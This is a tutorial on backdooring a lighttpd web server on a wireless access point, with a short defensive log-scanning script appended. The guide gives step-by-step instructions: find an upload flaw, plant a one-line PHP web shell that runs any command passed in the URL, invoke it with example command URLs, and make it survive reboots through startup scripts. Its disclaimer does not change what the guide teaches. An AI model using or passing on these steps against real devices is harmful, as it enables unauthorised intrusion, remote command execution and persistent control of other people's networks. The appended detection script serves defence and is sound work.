TL;DR
This guide shows how to add a backdoor to a vulnerable lighttpd web server running on a wireless access point (AP). Warning: This is for educational purposes only. Using this information without permission is illegal and unethical. We’ll cover finding a vulnerability, creating a simple PHP backdoor, uploading it, and accessing it.
Steps
- Identify the Vulnerability
  - First, determine the lighttpd version running on the AP. You can often find this in the web server’s banner page (e.g., by visiting http://[AP_IP]/) or through network scanning tools like Nmap: nmap -p 80 [AP_IP].
  - Search for known vulnerabilities associated with that specific version of lighttpd using resources like Exploit-DB (https://www.exploit-db.com/) or CVE databases (https://cve.mitre.org/). Look for vulnerabilities that allow arbitrary file uploads, remote code execution, or similar exploits.
  - For this example, we’ll assume a vulnerability exists allowing unrestricted file uploads via a web form (a common scenario in older versions or misconfigured installations).
- Create the Backdoor
  - A simple PHP backdoor can be created. Be extremely careful with this step, as backdoors are malicious code. This example is for demonstration only and should not be used in a production environment without thorough security review.
  - Create a file named backdoor.php with the following content: <?php system($_GET['cmd']); ?>. This backdoor executes any command passed through the ‘cmd’ parameter in the URL.
- Upload the Backdoor
  - Exploit the identified vulnerability to upload backdoor.php to a writable directory on the AP. This often involves using a web form or exploiting a file upload function.
  - The exact method depends entirely on the specific vulnerability. If it’s a simple file upload, you might use a tool like Burp Suite to modify the HTTP request and bypass any filename restrictions.
  - Common writable directories include /tmp/, /var/www/html/uploads/ or similar locations depending on the lighttpd configuration. Determine the correct path through reconnaissance (e.g., trying common paths).
- Access the Backdoor
  - Once uploaded, access the backdoor via a web browser using the following URL format: http://[AP_IP]/[backdoor_path]/backdoor.php?cmd=[command]. Replace [AP_IP] with the AP’s IP address and [backdoor_path] with the directory where you uploaded the file.
  - For example, to execute the command ‘ls -l’, use: http://192.168.1.100/uploads/backdoor.php?cmd=ls%20-l (note the URL encoding of the space).
- Persistence (Optional, but recommended for demonstration)
  - To maintain access even after a reboot, you can add the backdoor to the AP’s startup scripts. This is highly dependent on the AP’s operating system and configuration.
  - For example, if the AP runs BusyBox Linux, you might modify /etc/init.d/httpd (or similar) to execute your command upon startup. This requires root access, which may be obtained through further exploitation of vulnerabilities.
Important Considerations
- Security Risks: Backdoors are extremely dangerous and can compromise the entire network.
- Detection: Backdoors can often be detected by intrusion detection systems (IDS) or antivirus software.
- Ethical Hacking: Only perform these steps on systems you own or have explicit permission to test.
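To make the Detection point concrete, here is an added example (not part of the original guide): a Python scan of web server access-log lines for the trace the backdoor described above leaves behind, a request to a .php file under an upload or temp path carrying a command-style query parameter. The log lines are constructed samples, and the watched directories and parameter names are assumptions to tune per deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed values, tune per deployment: directories where uploads land and
# query parameter names typical of one-line PHP command shells.
UPLOAD_DIRS = ("/uploads/", "/tmp/")
SHELL_PARAMS = {"cmd", "exec", "command"}

# Client address is the first token; the request line is the quoted field.
REQUEST_RE = re.compile(r'^(\S+) .*?"(GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def score_line(line):
    """Return (client, path, reasons) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    parts = urlsplit(target)
    path = unquote(parts.path)
    is_php = path.lower().endswith(".php")
    reasons = []
    if is_php and any(d in path for d in UPLOAD_DIRS):
        reasons.append("script served from upload directory")
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = SHELL_PARAMS & {k.lower() for k in params}
    if is_php and hits:
        reasons.append("command-style parameter: " + ",".join(sorted(hits)))
    if not reasons:
        return None
    if status == "200":
        reasons.append("served with 200")  # the script exists and ran
    return client, path, reasons

def scan(lines):
    """Score every line and keep only the suspicious ones."""
    return [r for r in map(score_line, lines) if r]

# Constructed sample log lines (not from a real system).
SAMPLE_LOG = [
    '192.168.1.50 192.168.1.100 - [10/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.77 192.168.1.100 - [10/Jan/2024:10:02:13 +0000] "GET /uploads/backdoor.php?cmd=ls%20-l HTTP/1.1" 200 230 "-" "curl/8.0"',
    '192.168.1.50 192.168.1.100 - [10/Jan/2024:10:03:40 +0000] "GET /status.php?page=1 HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, path, reasons in scan(SAMPLE_LOG):
        print(client, path, "; ".join(reasons))
```

Only GET query strings are inspected here; a shell driven through POST bodies would still trip the upload-directory rule but not the parameter rule.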

